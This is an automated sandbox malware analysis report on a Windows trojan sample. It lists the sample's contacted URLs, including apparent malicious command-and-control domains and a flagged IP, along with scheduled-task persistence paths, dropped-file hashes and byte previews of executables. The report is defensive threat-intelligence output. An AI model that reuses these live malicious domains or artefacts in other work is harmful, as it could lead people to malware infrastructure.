                                                                                                                                  https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclSimpleXml.paBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                                    unknown
                                                                                                                                    https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclWin32.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                                      unknown
                                                                                                                                      http://moviecentral-petparade2.com/g9jvjfd74/index.php.phpexplorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://moviecentral-petparade.com/g9jvjfd73/index.phpbexplorer.exe, 0000000C.00000003.2173467898.00000000030DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://moviecentral-petparade2.com/g9jvjfd74/index.phpshqos.dll.muiexplorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://moviecentral-petparade2.com/g9jvjfd74/index.php#Kexplorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://moviecentral-petparade.com/g9jvjfd73/index.phpiexplorer.exe, 0000000C.00000003.2347246744.000000000303F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpexplorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://moviecentral-petparade.com/g9jvjfd73/index.phpcDexplorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclDateTime.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                                                      unknown
                                                                                                                                                      https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclRegistry.paBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                                                        unknown
                                                                                                                                                        https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclCharsets.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                                                          unknown
                                                                                                                                                          http://moviecentral-petparade.com/g9jvjfd73/index.phpOexplorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://moviecentral-petparade2.com/g9jvjfd74/index.phpLyexplorer.exe, 0000000C.00000002.2601540859.00000000030BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://moviecentral-petparade2.com/g9jvjfd74/index.phpswsock.dll.muiexplorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://moviecentral-petparade2.com/g9jvjfd74/index.phpcs_Kexplorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php3$explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php3%explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php#explorer.exe, 0000000C.00000003.2156574293.00000000030D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://moviecentral-petparade.com/g9jvjfd73/index.phpRexplorer.exe, 0000000C.00000003.2251682160.00000000030DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/JclConsole.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://moviecentral-petparade.com/g9jvjfd73/index.php9Dexplorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php(explorer.exe, 0000000C.00000003.2173311069.00000000030D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/windows/Snmp.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpoviecentral-petparade3.comexplorer.exe, 0000000C.00000003.2251682160.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.00000000030B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://moviecentral-petparade3.com/8bkjdSdfjCe/indexexplorer.exe, 0000000C.00000002.2601540859.00000000030D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php$explorer.exe, 0000000C.00000003.2347246744.000000000303F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.0000000003027000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://moviecentral-petparade2.com/g9jvjfd74/index.phpJMexplorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php0explorer.exe, 0000000C.00000003.2173311069.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2347011547.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156574293.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2251682160.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.00000000030D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php#$explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php1explorer.exe, 0000000C.00000003.2347011547.00000000030D4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2251682160.00000000030D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://moviecentral-petparade2.com/g9jvjfd74/index.phpcDexplorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php#%explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://moviecentral-petparade.com/g9jvjfd73/index.php$explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclUnicode.pasBGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        http://moviecentral-petparade2.com/g9jvjfd74/index.phpBMexplorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://moviecentral-petparade3.com/8bkjdSdfjCe/index.php8explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://moviecentral-petparade2.com/g9jvjfd74/index.phpjyexplorer.exe, 0000000C.00000002.2601540859.00000000030BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpC$Vexplorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://jcl.svn.sourceforge.net/svnroot/jcl/tags/JCL-2.4-Build4571/jcl/source/common/JclAnsiStrings.BGUO31BLG4WQAOX9MA4VF71OJ1M.exefalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://moviecentral-petparade3.com/8bkjdSdfjCe/index.phpAexplorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://www.vmware.com/0/BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                      172.67.213.173
                                                                                                                                                                                                                      moviecentral-petparade.comUnited States
                                                                                                                                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                      Analysis ID:1546122
                                                                                                                                                                                                                      Start date and time:2024-10-31 14:24:09 +01:00
                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                      Overall analysis duration:0h 6m 57s
                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                      Number of analysed new started processes analysed:19
                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                      Sample name:BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                      Classification:mal100.troj.evad.winEXE@18/10@37/1
                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                      • Number of executed functions: 34
                                                                                                                                                                                                                      • Number of non-executed functions: 78
                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                      • VT rate limit hit for: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                      09:25:03API Interceptor1x Sleep call for process: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe modified
                                                                                                                                                                                                                      09:25:18API Interceptor2x Sleep call for process: QTAgent_40.exe modified
                                                                                                                                                                                                                      09:25:26API Interceptor1x Sleep call for process: comp.exe modified
                                                                                                                                                                                                                      09:25:30API Interceptor858514x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                                      13:25:16Task SchedulerRun new task: QTAgent_40 path: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
                                                                                                                                                                                                                      13:25:16Task SchedulerRun new task: ServiceHub Controller path: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      s-part-0017.t-0009.t-msedge.netfattura di pagamento.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                                                                      http://www.kristinsacademy.com/?wptouch_switch=desktop&redirect=http://lagunaua.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                                                                      https://0nline1.logs-trading.site/?O462BZ3P81OgZBKGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241030_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                                                                      https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?e=wqutC4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                                                                      PURCHASE ORDER085.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                                                                      https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!s599af221dbfd41b9a607812ebc66d2cf&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VpSHltbG45MjdsQnBnZUJMcnhtMHM4QjRNbHFPTTJWd0ZlQTFNLWNhZ0lnRkE_ZT1aak8wczY&wd=target%28Sezione%20senza%20titolo.one%7C99ad2a4b-5ecc-495f-9ce8-040ac62eb8f2%2F%5BExternal%5D%20-%20Invoice%20%27s%208808-%7C9e6e973e-3cda-429a-a28f-c51dc242e5b1%2F%29&wdorigin=NavigationUrlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                                                                      Orden de compra.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                                                                      1225212711935914624.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                                                                      169778715180725424.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                                                      • 13.107.246.45
                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      CLOUDFLARENETUSSet-Up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.79.109
                                                                                                                                                                                                                      http://www.kristinsacademy.com/?wptouch_switch=desktop&redirect=http://lagunaua.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      Invoice Ref ++_Donuts.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.41.158
                                                                                                                                                                                                                      PO-000172483 (2).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      Uschamber-TimeSheet Reports.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.17.25.14
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                      https://www.chambersschool.org/programs/early-childhoodGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.33.140
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\comp.exe
                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):544256
                                                                                                                                                                                                                      Entropy (8bit):6.52754951546901
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:F/zTlHFqRB2rAikFpF5ibr4jGq88DUqlL6PHtqekY:cRBzj5ifj8DHoftqeH
                                                                                                                                                                                                                      MD5:BE34377934380A888F46809916989EF2
                                                                                                                                                                                                                      SHA1:B2E98C16C4F19E128EB243E5427C2904A6D8D9FD
                                                                                                                                                                                                                      SHA-256:9ECACDB5102C2543CFEA48CB11808EB7C92331F5F3D107990271F9D53CAB20FD
                                                                                                                                                                                                                      SHA-512:B26303F92EA1E387BBE4C4DE7961255D3485B77E5FD621D79F59CCBB7ECFAE5AC5E160AA4D93896DB978D6D1864703967B1DF58C8439490E0B9F947652D1533D
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D...*...*...*..)...*../.r.*......*..)...*../..*.......*......*..+...*...+.?.*...#...*.......*...(...*.Rich..*.........PE..L....m.\..........................................@.......................................@..................................5...................................E..l...8...............................@...............@............................text............................... ..`.rdata...I.......J..................@..@.data....m...P...,...>..............@....rsrc................j..............@..@.reloc...E.......F...l..............@..Bhla.......... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
                                                                                                                                                                                                                      File Type:PNG image data, 4432 x 696, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1404020
                                                                                                                                                                                                                      Entropy (8bit):7.994316031132943
                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                      SSDEEP:24576:nZpjsNEfC0MflWQt7hCFbE+az7H+cwTYWWTDx+NV5NS7hMuyoPiR8lT1nHVGRAn:nGX0MfgUwpE+a/9CMTDoX5NKMKS8F5M0
                                                                                                                                                                                                                      MD5:E11362AB856AD40E432C9AA356EA7FB0
                                                                                                                                                                                                                      SHA1:D20E84D3054271DE92A785627BDA5EC1C3007BDE
                                                                                                                                                                                                                      SHA-256:2EE91362BBE22AADA4D879FA18DFC5FDA57700BD8255B084789339C6950148A2
                                                                                                                                                                                                                      SHA-512:ECCA4E8BECC0E3AEDE806AA0B45EE648085F821A597A7E827D401AE92EA68E371E967C511B44E2D4CDE114F05BD52768BAD0B3E26D5B8CD9F4EEBB27F8FBABDA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.PNG........IHDR...P............7.. .IDATx..;..G..z.....{-A....m..}A........#w.#W.=..&.r.....6..........W\.dFg......F.o...:.2.A.q...........}./ ..`.....6.c...../.~.|k...K.oq..i...G.&...i..\J......3.....?.....Z...B.....sn.N^..........G.."w.R....x..,.....ws).5......*+. B.\.rw..>HY...]..../...J..ntM.$c...%...uU.e..f.../cY.~$ `......x.......$...$..uC...[c$.1p...`.FH>..[H>..#B.d.uU....@k..[f^uwg0$...v.c.G.u......2.n...b..V.@... ......g..@.%.c.0..?s}.0v..&..1...K...1..#..}......$.....6..k.D..n.~e.....H..K)..A..+|..$[.|.u]........Rp....^.1&...M...p.=...H........~%......{.{.........."h.......@S...>..A...B..o..w....a..4[7.9...q....|$....H..Xh:..W.H..%..O..G..V..e...|...b....B....N..............7..[...d-.:.~....c...............-.o............9.....,...-.-.oj.=....{.|.$c|..J.Ld..`.J.)Qi=......d..h.V.....`Z.j.AB...K.7=...k.....p!.^..j.Q...8....-..$.....~]:..$..(_J...C..RH.....o..!....H>..EA.dH...T.....Jr...v.bD....B........6.{....._.... P.{....m
                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1276017
                                                                                                                                                                                                                      Entropy (8bit):7.663037680659601
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:02IvDr159I4l3Jc3uBrXbo0B/QlR1p7TJ8zfAY72QDd:23i3uBrcn1tJAx2wd
                                                                                                                                                                                                                      MD5:3ECE2647944A5E70F0BE39F183732A13
                                                                                                                                                                                                                      SHA1:97AB9ECDCE347369E3AF1EF32E5DFFEC484C413E
                                                                                                                                                                                                                      SHA-256:5A9B859CD0C5BD1AF699953A4D0030E39E3F458283A9D07499265277667168CA
                                                                                                                                                                                                                      SHA-512:B5BACAAC468F7094B733E0D0E024F38E58D2A8955F40C950DDBC65DD690668A15BA0F3F18E9B6EB1CC92B144D865EC89B6DC0293D3B5DC9F4C4E7B49BF2F13C7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..=v..=v..=v..=v..=v.=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..<v..m&..i7..p...R...I*..S...N*..\...p...a&..Z...N*..\...Mv..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..t...T...G...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..~...I...N...^...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..t8..oS..T...N....8..a0..P...O...=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v...F..A.=v..=v..=v..=v..=v..=v..=v..=v..=v..=v..=v
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
                                                                                                                                                                                                                      File Type:PNG image data, 4432 x 696, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1404020
                                                                                                                                                                                                                      Entropy (8bit):7.994316031132943
                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                      SSDEEP:24576:nZpjsNEfC0MflWQt7hCFbE+az7H+cwTYWWTDx+NV5NS7hMuyoPiR8lT1nHVGRAn:nGX0MfgUwpE+a/9CMTDoX5NKMKS8F5M0
                                                                                                                                                                                                                      MD5:E11362AB856AD40E432C9AA356EA7FB0
                                                                                                                                                                                                                      SHA1:D20E84D3054271DE92A785627BDA5EC1C3007BDE
                                                                                                                                                                                                                      SHA-256:2EE91362BBE22AADA4D879FA18DFC5FDA57700BD8255B084789339C6950148A2
                                                                                                                                                                                                                      SHA-512:ECCA4E8BECC0E3AEDE806AA0B45EE648085F821A597A7E827D401AE92EA68E371E967C511B44E2D4CDE114F05BD52768BAD0B3E26D5B8CD9F4EEBB27F8FBABDA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.PNG........IHDR...P............7.. .IDATx..;..G..z.....{-A....m..}A........#w.#W.=..&.r.....6..........W\.dFg......F.o...:.2.A.q...........}./ ..`.....6.c...../.~.|k...K.oq..i...G.&...i..\J......3.....?.....Z...B.....sn.N^..........G.."w.R....x..,.....ws).5......*+. B.\.rw..>HY...]..../...J..ntM.$c...%...uU.e..f.../cY.~$ `......x.......$...$..uC...[c$.1p...`.FH>..[H>..#B.d.uU....@k..[f^uwg0$...v.c.G.u......2.n...b..V.@... ......g..@.%.c.0..?s}.0v..&..1...K...1..#..}......$.....6..k.D..n.~e.....H..K)..A..+|..$[.|.u]........Rp....^.1&...M...p.=...H........~%......{.{.........."h.......@S...>..A...B..o..w....a..4[7.9...q....|$....H..Xh:..W.H..%..O..G..V..e...|...b....B....N..............7..[...d-.:.~....c...............-.o............9.....,...-.-.oj.=....{.|.$c|..J.Ld..`.J.)Qi=......d..h.V.....`Z.j.AB...K.7=...k.....p!.^..j.Q...8....-..$.....~]:..$..(_J...C..RH.....o..!....H>..EA.dH...T.....Jr...v.bD....B........6.{....._.... P.{....m
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe
                                                                                                                                                                                                                      File Type:PNG image data, 4432 x 696, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1404020
                                                                                                                                                                                                                      Entropy (8bit):7.994316031132943
                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                      SSDEEP:24576:nZpjsNEfC0MflWQt7hCFbE+az7H+cwTYWWTDx+NV5NS7hMuyoPiR8lT1nHVGRAn:nGX0MfgUwpE+a/9CMTDoX5NKMKS8F5M0
                                                                                                                                                                                                                      MD5:E11362AB856AD40E432C9AA356EA7FB0
